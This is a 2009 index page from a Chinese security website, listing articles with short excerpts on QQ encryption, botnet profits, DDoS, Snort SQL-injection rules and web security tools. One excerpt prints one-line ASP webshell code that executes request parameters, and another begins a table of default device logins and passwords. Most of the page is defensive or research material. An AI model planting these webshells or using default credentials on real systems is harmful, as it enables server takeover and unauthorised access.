首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>网络安全>列表
QQ2009正式版SP4文本信息和文件传输的安全性研究
  日期:2009-11-23 10:34:21 点击:570 评论:0
Author: xisigr[xeye] EMail: xisigr@gmail.com Site: http://xeyeteam.appspot.com Date: 2009-10-27 [ 目录 ] 0x00 前言 0x01 TEA算法简介 0x02 QQ2009如何获取Session Key及其安全性 0x021 连接服务器操作0x91 0x022 客户端登陆请求0xba 0x023 发送密码验证0xdd 0x02
一台肉鸡能创造多少价值?为您讲解网站流量赚钱
  日期:2009-11-16 11:02:47 点击:173 评论:0
作为科普,学习, 再转贴一篇, 来自某网马工作室. 本文有 毒 ,阅读者风险自负. 转贴开始: 文章出处:小锋网马工作室 www.jxfhack.com 欢迎转载。 文章标题:一台肉鸡能创造多少价值?为您讲解网站流量赚钱。 一台肉鸡,值多少钱? 很多人会觉得,大概就值个1毛钱吧。因为
关于流量,木马,插件,网马赚钱的关系与释义
  日期:2009-11-16 11:00:11 点击:240 评论:0
作为科普,学习, 转贴一篇, 来自某网马工作室. 本文有 毒 ,阅读者风险自负! 转贴开始: 关于流量,木马,插件,网马赚钱的关系与释义 (不介意转载,转载请注明来自www.jxfhack.com) 一直想写一篇关于流量的方面的文章。在网络这行,流量让无数人发了大财。好多人挤破脑
【翻译】 Metasploit:重现犯罪场景
  日期:2009-11-11 11:20:08 点击:407 评论:0
作者:Peter Silberman, Steve Davis 译者:riusksk (泉哥:http://riusksk.blogbus.com) 原文出处:BlackHat USA 2009 前言 Metasploit:重现犯罪场景,旨在演示如何结合现有工具资源进行内存分析与提取,以恢复先前不易访问到的数据。此处现有的资源主要是指如何利用 p
Soc运营中心的一次病毒处理
  日期:2009-11-10 10:54:17 点击:57 评论:0
2009年4月22日,天融信安全工程师小张像往常一样,坐在电脑前分析着每小时的安全日志.突然,某单位图片查询服务器(192.168.1.5)大量的异常请求链接引起了小张的关注,多年积累的经验告诉他,该服务器存在安全问题. 作为天融信安全服务工作中的一部分,小张和同事们首先过滤出
检查 Web 应用安全的几款开源免费工具
  日期:2009-11-06 10:30:00 点击:861 评论:0
文/ lzy.je 这几天应工作的需要,一直在调查、研究一些开源、免费的 Web 应用安全缺陷检测软件。经过试用,感觉这方面的工具很多,但和 Rational AppScan 这种商用软件相比都不够强大、全面(当然,可比性也不大),各个工具都覆盖了一些方面的问题,但又都不全面,可
抵抗DDoS防火墙更新换代
  日期:2009-11-04 17:28:44 点击:54 评论:0
面对DDoS的强势攻击,历数现有的很多先进的防火墙产品概念,往往会不由自主地思考,为了抵抗DDoS简单粗暴的进攻,哪种模式更具竞争力?更先进的防火墙模式应该是怎样的?或许防火墙是应该再变变了。 与那些精心设计的攻击手段相比,DDoS显得十分粗线条,甚至特别不具有
Default Logins and Passwords for Networked Devices
  日期:2009-10-30 10:17:00 点击:352 评论:0
Manufacturer Model OS Version Login Password 3Com - 1.25 root letmein 3Com Super Stack 2 Switch Any manager manager 3Com AccessBuilder 7000 BRI Any - - 3Com CoreBuilder 2500 - - - 3Com Switch 3000/3300 - manager manager 3Com Switch 3000/3300 - admin
Md5(base64)加密与解密实战
  日期:2009-10-28 11:30:19 点击:753 评论:0
Md5 ( base64 )加密与解密实战 陈小兵 [A.S.T] 本文已被黑客防线录用,转载请注明出处! 在对某一个 CMS 系统进行安全检测时,通过注入点获取其管理员表中的管理员和密码数据,但由于不知道该密码数据采用何种加密方式,虽然知道 CMS 系统管理后台,但苦于没有破解管
来自IT的警匪片 账号盗窃答案的追捕
  日期:2009-10-15 12:00:40 点击:160 评论:0
(注本文应国内电脑爱好者杂志而应急写的一篇稿件) 隔着办公室的玻璃窗,可以看到网监大队监控室里忙碌的干警们,近来,网络中出现大规模的挂马盗窃用户账户信息案件引起了省厅的高度重视,委派从事了多年反黑反病毒工作的老刀现场坐镇部署指挥,现在,他正在召集大家
利用Sniffer进行DOS攻击流量分析
  日期:2009-10-12 11:35:44 点击:66 评论:0
1. 环境及现象简介 用户的网络是一个IDC网络环境,包括局域网和Internet接入,其中Internet接入为两条千兆以太网接入,内部局域网多是游戏网站寄放的游戏服务器主机。网络拓扑如下: 该网络出现网络性能突然下降,但没有发现网络设备出现异常。 2. 找出产生网络流量最大
Finding vulnerabilities in PHP scripts (FULL)
  日期:2009-09-10 10:04:15 点击:78 评论:0
Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) Author : SirGod Email : sirgod08@gmail.com Contents : 1) About 2) Some stuff 3) Remote File Inclusion 3.0 - Basic example 3.1 - Simple example 3.2 - How to fix 4) Local File Inclus
Web应用防火墙(WAF Web Application Firewall)评价标准-译文
  日期:2009-08-31 10:47:06 点击:175 评论:0
之前介绍过WAF评估标准(参见: Web Application Firewall Evaluation Criteria-WAF评估标准-v1.0 ),这份标准对于开发WAF有很好的指导作用,至少为你框定了很好的实现范围,不过之前给出的是英文原版的。一直以来自己也没有时间去翻译它,不过今天我看到有同学已经翻
一句话木马的部分整理
  日期:2009-08-13 10:44:46 点击:120 评论:0
%execute request(#)% %execute request(chr(35))% script language=VBScript runat=serverif request(chr(35)) then ExecuteGlobal request(chr(35)) /script %ExecuteGlobal request(chr(35))% %eval request(#)% 以上都是正常的SHELL,下面几个是变形,或者是用来免
发现最新式的DDOS攻击方式
  日期:2009-07-09 10:29:23 点击:205 评论:0
在TCP三次握手后插入伪造的TCP包 用 Socket的API Connect完成TCP建立连接的三次握手,同时子进程抓包,抓完三次握手的包后,插入第四个包即可,从对端返回的第五个包来看插入成功了,但因为插入了一个TCP包,之后的连接将发生混乱。可以将插入的那个包Data设置为HTTP R
撰写一组SNORT规则防御SQL注入
  日期:2009-07-06 11:29:03 点击:93 评论:0
1 .文档概述 本文档详细阐述了 SQL 注入规则集合的设计过程和理论依据,并对每一类规则的检测原理和修正过程进行了相关的分析。 2 .规则部署要求 适用于包含 SNORT 2.3 及以上版本检测引擎 。 3 .规则详细设计 3.1. 对 select+union+select 利用的检测 SELECT+union
关于安全服务部门下半年规划
  日期:2009-06-26 11:19:36 点击:138 评论:0
公司让写的关于安全服务部门下半年的下半年规划,写了一下午,头都大了。第一次写这样的东西,都不知道怎么写。贴上来,大家指正下。 PS:以下完全代表个人想法,错误之处在所难免,各位看官,看看就好,欢迎大家交流。 1、概述 XXXX 的安全服务部门主要包括项目的售前
信息安全管理体系在基金公司的实践
  日期:2009-06-22 11:24:48 点击:549 评论:0
一、基金行业信息系统现状 网络建设方面,多数基金公司的网络是分为交易网及办公网两张网,两网间存在着一定数据交换(通过U盘或专用服务协议),两网间并未实现真正的物理隔离或强逻辑隔离。 基金行业的IT系统主要包括投资交易系统、估值系统、行情分析系统、估值系统
pfSense 防火墙硬件平台性能评估指导手册
  日期:2009-06-08 12:21:38 点击:319 评论:0
摘要: 通过阅读 pfSense 官方文档了解防火墙性能的评估方法 作者: By REISTLIN [雷斯林] MSN: Rexxxxxx@hotmail.com QQ: 3A984 版权: 原创文章.转载请保留作者信息和原文完整.谢绝任何方式的摘要. 本文是根据[ pfSense ] 的官方文档 Hardware Sizing Guidance 翻译的.
论甲方的信息安全
  日期:2009-06-08 12:19:59 点击:106 评论:0
我之前在blog上写了一篇闲话性质的信息安全入门。写完了以后,由于害怕那些功力深厚的老鸟们嘲笑我:井底之蛙也敢谈入门? 所以扭扭捏捏的在文章里写上了以下文字用于免责: ,因为毕竟,从各方面来说,都还是不够资格的。但 原文: http://hi.baidu.com/zyqq/blog/ite
共15页/284条记录 首页 上一页 [1] 2 [3] [4] [5] [6] [7] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  Exploits
  系统安全
  网络基础
  病毒分析
网络安全
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved